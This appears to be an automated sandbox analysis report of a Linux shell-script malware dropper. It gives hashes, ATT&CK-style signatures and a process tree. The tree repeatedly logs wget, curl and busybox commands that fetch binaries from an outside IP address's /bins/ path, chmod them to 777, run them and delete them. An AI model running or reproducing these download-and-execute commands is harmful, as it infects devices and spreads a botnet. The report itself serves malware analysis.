Analysis
-
max time kernel
80s -
max time network
82s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
25/10/2024, 01:17
Static task
static1
Behavioral task
behavioral1
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
-
Size
10KB
-
MD5
5162438af338945d51bf275a08c71d1b
-
SHA1
08afc256b7a2d67ce5d019cf6633b8ac69ecf749
-
SHA256
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760
-
SHA512
f106888effaf28760884756fafc0f9eaa435bcca7312c118cd9de9e6247c65cbc3568f3483e66eb553e80c73a4279c99136513d3500b4b2bef751dc2d1839d32
-
SSDEEP
96:XNhHXJX740n2TT9740rA10KKNDcgQ9Jok:XNhHXJ740n2h40X10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 959 busybox 962 rm 750 wget 755 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB 758 rm 958 curl 961 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB 751 curl 752 busybox 957 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:716
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:718
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:725
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:740
-
-
/bin/chmodchmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:746
-
-
/bin/chmodchmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:750
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:752
-
-
/bin/chmodchmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:755
-
-
/bin/rmrm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:758
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:776
-
-
/bin/chmodchmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:790
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:798
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:807
-
-
/bin/chmodchmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:818
-
-
/bin/chmodchmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:822
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:827
-
-
/bin/chmodchmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:830
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:831
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:832
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:839
-
-
/bin/chmodchmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:847
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:848
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:869
-
-
/bin/chmodchmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:872
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:873
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:875
-
-
/bin/chmodchmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:878
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:879
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:881
-
-
/bin/chmodchmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:884
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:885
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:887
-
-
/bin/chmodchmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:890
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:891
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:893
-
-
/bin/chmodchmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:896
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:897
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:899
-
-
/bin/chmodchmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:902
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:903
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:905
-
-
/bin/chmodchmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:908
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:909
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:911
-
-
/bin/chmodchmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:914
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:915
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:917
-
-
/bin/chmodchmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:920
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:921
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:923
-
-
/bin/chmodchmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:926
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:927
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:929
-
-
/bin/chmodchmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:932
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:933
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:935
-
-
/bin/chmodchmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:938
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:939
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:941
-
-
/bin/chmodchmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:944
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:945
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:947
-
-
/bin/chmodchmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:950
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:951
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:953
-
-
/bin/chmodchmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:956
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:957
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:959
-
-
/bin/chmodchmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:961
-
-
/bin/rmrm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:962
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:963
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:965
-
-
/bin/chmodchmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:968
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:969
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:971
-
-
/bin/chmodchmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:974
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:975
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:977
-
-
/bin/chmodchmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- File and Directory Permissions Modification
PID:978
-
-
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- Executes dropped EXE
PID:979
-
-
/bin/rmrm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:980
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:981
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:982
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:983
-
-
/bin/chmodchmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- File and Directory Permissions Modification
PID:984
-
-
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- Executes dropped EXE
PID:985
-
-
/bin/rmrm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:986
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97